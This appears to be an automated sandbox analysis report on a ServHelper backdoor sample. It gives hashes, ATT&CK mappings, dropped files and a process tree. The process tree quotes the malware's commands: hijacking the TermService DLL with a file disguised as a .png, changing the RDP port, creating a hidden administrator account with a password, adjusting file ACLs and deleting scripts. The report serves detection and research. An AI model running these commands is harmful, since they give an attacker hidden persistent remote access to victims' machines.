servhelper | c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49

Analysis

max time kernel
56s
max time network
57s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
17-04-2022 14:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exe
Size

3.2MB
MD5

9a3b8737a54ec78cd176fefa99845382
SHA1

d5050cf9f103b4c4a2210079ce41e534548c73b0
SHA256

c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49
SHA512

06f77e46c757b63b75e1fca81725163d82b139b83105a8638010d1ed150509da54cdeff0f7562eef02dfe11347eee09023454e641fc94d50ac06793466becf16

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid	Process
4920	icacls.exe
4304	icacls.exe
4492	icacls.exe
736	icacls.exe
4244	icacls.exe
3084	takeown.exe
2676	icacls.exe
4700	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000a00000001e7be-176.dat	upx
behavioral2/files/0x000900000001e7ca-177.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1940
1940

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid	Process
4920	icacls.exe
4304	icacls.exe
4492	icacls.exe
736	icacls.exe
4244	icacls.exe
3084	takeown.exe
2676	icacls.exe
4700	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1812	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4452	powershell.exe
4452	powershell.exe
3576	powershell.exe
3576	powershell.exe
4784	powershell.exe
4784	powershell.exe
1504	powershell.exe
1504	powershell.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
656
656

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exe

description	pid	Process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeRestorePrivilege	4700	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 4108 wrote to memory of 4452	4108	c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exe	76
PID 4108 wrote to memory of 4452	4108	c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exe	76
PID 4452 wrote to memory of 1544	4452	powershell.exe	78
PID 4452 wrote to memory of 1544	4452	powershell.exe	78
PID 1544 wrote to memory of 2864	1544	csc.exe	79
PID 1544 wrote to memory of 2864	1544	csc.exe	79
PID 4452 wrote to memory of 3576	4452	powershell.exe	80
PID 4452 wrote to memory of 3576	4452	powershell.exe	80
PID 4452 wrote to memory of 4784	4452	powershell.exe	82
PID 4452 wrote to memory of 4784	4452	powershell.exe	82
PID 4452 wrote to memory of 1504	4452	powershell.exe	84
PID 4452 wrote to memory of 1504	4452	powershell.exe	84
PID 4452 wrote to memory of 3084	4452	powershell.exe	87
PID 4452 wrote to memory of 3084	4452	powershell.exe	87
PID 4452 wrote to memory of 2676	4452	powershell.exe	88
PID 4452 wrote to memory of 2676	4452	powershell.exe	88
PID 4452 wrote to memory of 4700	4452	powershell.exe	89
PID 4452 wrote to memory of 4700	4452	powershell.exe	89
PID 4452 wrote to memory of 4920	4452	powershell.exe	90
PID 4452 wrote to memory of 4920	4452	powershell.exe	90
PID 4452 wrote to memory of 4304	4452	powershell.exe	91
PID 4452 wrote to memory of 4304	4452	powershell.exe	91
PID 4452 wrote to memory of 4492	4452	powershell.exe	92
PID 4452 wrote to memory of 4492	4452	powershell.exe	92
PID 4452 wrote to memory of 736	4452	powershell.exe	93
PID 4452 wrote to memory of 736	4452	powershell.exe	93
PID 4452 wrote to memory of 4244	4452	powershell.exe	94
PID 4452 wrote to memory of 4244	4452	powershell.exe	94
PID 4452 wrote to memory of 1724	4452	powershell.exe	95
PID 4452 wrote to memory of 1724	4452	powershell.exe	95
PID 4452 wrote to memory of 1812	4452	powershell.exe	96
PID 4452 wrote to memory of 1812	4452	powershell.exe	96
PID 4452 wrote to memory of 1584	4452	powershell.exe	97
PID 4452 wrote to memory of 1584	4452	powershell.exe	97
PID 4452 wrote to memory of 3184	4452	powershell.exe	98
PID 4452 wrote to memory of 3184	4452	powershell.exe	98
PID 3184 wrote to memory of 5096	3184	net.exe	99
PID 3184 wrote to memory of 5096	3184	net.exe	99
PID 4452 wrote to memory of 4476	4452	powershell.exe	100
PID 4452 wrote to memory of 4476	4452	powershell.exe	100
PID 4476 wrote to memory of 1140	4476	cmd.exe	101
PID 4476 wrote to memory of 1140	4476	cmd.exe	101
PID 1140 wrote to memory of 3212	1140	cmd.exe	102
PID 1140 wrote to memory of 3212	1140	cmd.exe	102
PID 3212 wrote to memory of 3844	3212	net.exe	103
PID 3212 wrote to memory of 3844	3212	net.exe	103
PID 4452 wrote to memory of 2396	4452	powershell.exe	104
PID 4452 wrote to memory of 2396	4452	powershell.exe	104
PID 2396 wrote to memory of 4384	2396	cmd.exe	105
PID 2396 wrote to memory of 4384	2396	cmd.exe	105
PID 4384 wrote to memory of 3008	4384	cmd.exe	106
PID 4384 wrote to memory of 3008	4384	cmd.exe	106
PID 3008 wrote to memory of 4740	3008	net.exe	107
PID 3008 wrote to memory of 4740	3008	net.exe	107
PID 3592 wrote to memory of 948	3592	cmd.exe	111
PID 3592 wrote to memory of 948	3592	cmd.exe	111
PID 948 wrote to memory of 2276	948	net.exe	112
PID 948 wrote to memory of 2276	948	net.exe	112
PID 1200 wrote to memory of 4220	1200	cmd.exe	115
PID 1200 wrote to memory of 4220	1200	cmd.exe	115
PID 4220 wrote to memory of 1480	4220	net.exe	116
PID 4220 wrote to memory of 1480	4220	net.exe	116
PID 4288 wrote to memory of 1428	4288	cmd.exe	119
PID 4288 wrote to memory of 1428	4288	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exe
"C:\Users\Admin\AppData\Local\Temp\c88f2ff5e016aba6c9cfb9be8afe34daa5977bf26e91e1fcfac1594488dd7e49.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4108
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5eergr0f\5eergr0f.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1544
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF467.tmp" "c:\Users\Admin\AppData\Local\Temp\5eergr0f\CSCC445A134A1C5459BACFB9E714881033.TMP"
      4⤵
      PID:2864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3084
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2676
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4920
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4304
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4492
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:736
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4244
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1724
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1812
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1584
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:5096
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1140
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3212
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4384
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4740
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3756
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4412

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:2276

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc CPqFS1y0 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\system32\net.exe
  net.exe user wgautilacc CPqFS1y0 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc CPqFS1y0 /add
    3⤵
    PID:1480

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4288
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:1428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1284

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
1⤵
PID:380
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
  2⤵
  PID:1960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
    3⤵
    PID:1004

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:2740
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:2252

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc CPqFS1y0
1⤵
PID:1236
- C:\Windows\system32\net.exe
  net.exe user wgautilacc CPqFS1y0
  2⤵
  PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc CPqFS1y0
    3⤵
    PID:1132

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5eergr0f\5eergr0f.dll

Filesize
3KB

MD5
17b4361f21acea229469bac218f39cad

SHA1
4c668203801a92e29427cc64b48aa6be72b23217

SHA256
a9bbefdf67617afe5785a276cf17023ec3323aa6d37b9413ec79eb125bf22d25

SHA512
a13100aac31e1492f0aad2e887e29cae44a38284c416ea220a3c4e0b8a6ecd04153c3265a2dc81791bd1f5ecd84bc3973cca0c302817abd9a6264483b885c075

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF467.tmp

Filesize
1KB

MD5
bfc43f0a5e77a137a0481a3172ba5691

SHA1
79fc4e481405ad916a47b53f7fafdc5a61b3504f

SHA256
b46a3f7f1d739d724ca15e53e381a460c987cbfef61ded9a4735f2815c6a07c1

SHA512
dacfdb512c0823cf5a41e4b895d5e5ba64f0f2083975323fb005de5aef37e1a62d0eb6237723fa86269d2665c0d150bf583c8d5a5e1cce3946b042dfd98e982e

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
e4262f985f2c3b9284c46a4f74afe9c2

SHA1
59609e1ca8c1e55f3406706c4711b02b8122ec8f

SHA256
5fe9aa0f1785337e5e8d1912a0072b53c79316d856fa9dc37bfb5892f88fb8ae

SHA512
df88c2e2de879427e08c3a2110678abe1d855d10fad54ab6955198599496c789933028f331721244d09e1dd202d732d4b409efe09fc999a902fbed3b0b531ee0

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
55KB

MD5
0efa52607c774eedb0e703033211ad61

SHA1
71e00025344e9dec112351ad4c6af60cd24f2cad

SHA256
8ae7bbae457a2c34d4d135f2a4883b5a36bfebd65fa4fa832d3dc8e5fcc0fc84

SHA512
08975293dccfbf407dfc04bda5eca429a8e1e54d9a0dc16d80f5763262264d2f115bcb17aa1f6348db7da691bb3f6897ec65e92b37278ec6eace986ad9b10f7d

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
943KB

MD5
3d1f76379d637f1e00a079119584ea16

SHA1
52a80ccf951360b6e156a13fc08f8d84866bc795

SHA256
f676b515c67a27811ab5144b02ba958866bb499877da2d2cbf4893730f4009b4

SHA512
7d0cb2e5c8dbff980aa058f69487d0f39481700ff9dd3f27adfa9f2d8b12ad66b9bef5aa812a4b2cab0a151dc0ceef03e3d6d113a4e31fcc13416739b219bd3d

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5eergr0f\5eergr0f.0.cs

Filesize
504B

MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5eergr0f\5eergr0f.cmdline

Filesize
369B

MD5
9c13662a2add6f022664d5f29e10ef12

SHA1
ad3564216822b4ad5e1f6e9aa1590a409658e407

SHA256
6b8966022a19ff6e53d42c648b2ab0f60061fa0e6fc2e198f77f90c0561b48dc

SHA512
a38f57ca9713f7fbe6e246e935f24910136043621f99e4b7f2b99b54b1163af843694726e40aca457103ea0f845575f6b9af4e8a6229d634fcc8d454b867af63

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5eergr0f\CSCC445A134A1C5459BACFB9E714881033.TMP

Filesize
652B

MD5
eaf0539995664ad0c697739ed336da12

SHA1
c0881da2b4fc9e5cc5b031a3d78c5a198b4df50e

SHA256
58faa2fffa5231d6e87e3743f1f9ecba8bcc148709da00b1e34f58977340e985

SHA512
776a70696c874a5aaa7ce59c89c8552605214ce2285e77820c3258bb1608f39b22b572335845065af9c3c0bf5b100a546017b853724df36f6ddfa79c61c7c149

Download Submit
memory/736-161-0x0000000000000000-mapping.dmp

Download
memory/948-178-0x0000000000000000-mapping.dmp

Download
memory/1004-186-0x0000000000000000-mapping.dmp

Download
memory/1132-190-0x0000000000000000-mapping.dmp

Download
memory/1140-169-0x0000000000000000-mapping.dmp

Download
memory/1284-183-0x0000000000000000-mapping.dmp

Download
memory/1392-187-0x0000000000000000-mapping.dmp

Download
memory/1428-182-0x0000000000000000-mapping.dmp

Download
memory/1480-181-0x0000000000000000-mapping.dmp

Download
memory/1504-152-0x00007FFAF5F60000-0x00007FFAF6A21000-memory.dmp

Filesize
10.8MB

Download
memory/1504-151-0x0000000000000000-mapping.dmp

Download
memory/1544-138-0x0000000000000000-mapping.dmp

Download
memory/1584-165-0x0000000000000000-mapping.dmp

Download
memory/1724-163-0x0000000000000000-mapping.dmp

Download
memory/1812-164-0x0000000000000000-mapping.dmp

Download
memory/1960-185-0x0000000000000000-mapping.dmp

Download
memory/2252-188-0x0000000000000000-mapping.dmp

Download
memory/2276-179-0x0000000000000000-mapping.dmp

Download
memory/2396-172-0x0000000000000000-mapping.dmp

Download
memory/2676-156-0x0000000000000000-mapping.dmp

Download
memory/2864-141-0x0000000000000000-mapping.dmp

Download
memory/3008-174-0x0000000000000000-mapping.dmp

Download
memory/3084-154-0x0000000000000000-mapping.dmp

Download
memory/3184-166-0x0000000000000000-mapping.dmp

Download
memory/3212-170-0x0000000000000000-mapping.dmp

Download
memory/3576-147-0x0000000000000000-mapping.dmp

Download
memory/3576-148-0x00007FFAF5F60000-0x00007FFAF6A21000-memory.dmp

Filesize
10.8MB

Download
memory/3756-192-0x0000000000000000-mapping.dmp

Download
memory/3844-171-0x0000000000000000-mapping.dmp

Download
memory/4136-189-0x0000000000000000-mapping.dmp

Download
memory/4220-180-0x0000000000000000-mapping.dmp

Download
memory/4244-162-0x0000000000000000-mapping.dmp

Download
memory/4304-159-0x0000000000000000-mapping.dmp

Download
memory/4384-173-0x0000000000000000-mapping.dmp

Download
memory/4412-193-0x0000000000000000-mapping.dmp

Download
memory/4452-145-0x0000022EA5B60000-0x0000022EA5CD6000-memory.dmp

Filesize
1.5MB

Download
memory/4452-135-0x0000022E9D3B0000-0x0000022E9D3F4000-memory.dmp

Filesize
272KB

Download
memory/4452-194-0x0000022E9DD90000-0x0000022E9DE06000-memory.dmp

Filesize
472KB

Download
memory/4452-146-0x0000022EA5EF0000-0x0000022EA60FA000-memory.dmp

Filesize
2.0MB

Download
memory/4452-133-0x0000000000000000-mapping.dmp

Download
memory/4452-134-0x0000022E82460000-0x0000022E82482000-memory.dmp

Filesize
136KB

Download
memory/4452-136-0x00007FFAF5F60000-0x00007FFAF6A21000-memory.dmp

Filesize
10.8MB

Download
memory/4476-168-0x0000000000000000-mapping.dmp

Download
memory/4492-160-0x0000000000000000-mapping.dmp

Download
memory/4700-157-0x0000000000000000-mapping.dmp

Download
memory/4740-175-0x0000000000000000-mapping.dmp

Download
memory/4784-149-0x0000000000000000-mapping.dmp

Download
memory/4784-150-0x00007FFAF5F60000-0x00007FFAF6A21000-memory.dmp

Filesize
10.8MB

Download
memory/4920-158-0x0000000000000000-mapping.dmp

Download
memory/5096-167-0x0000000000000000-mapping.dmp

Download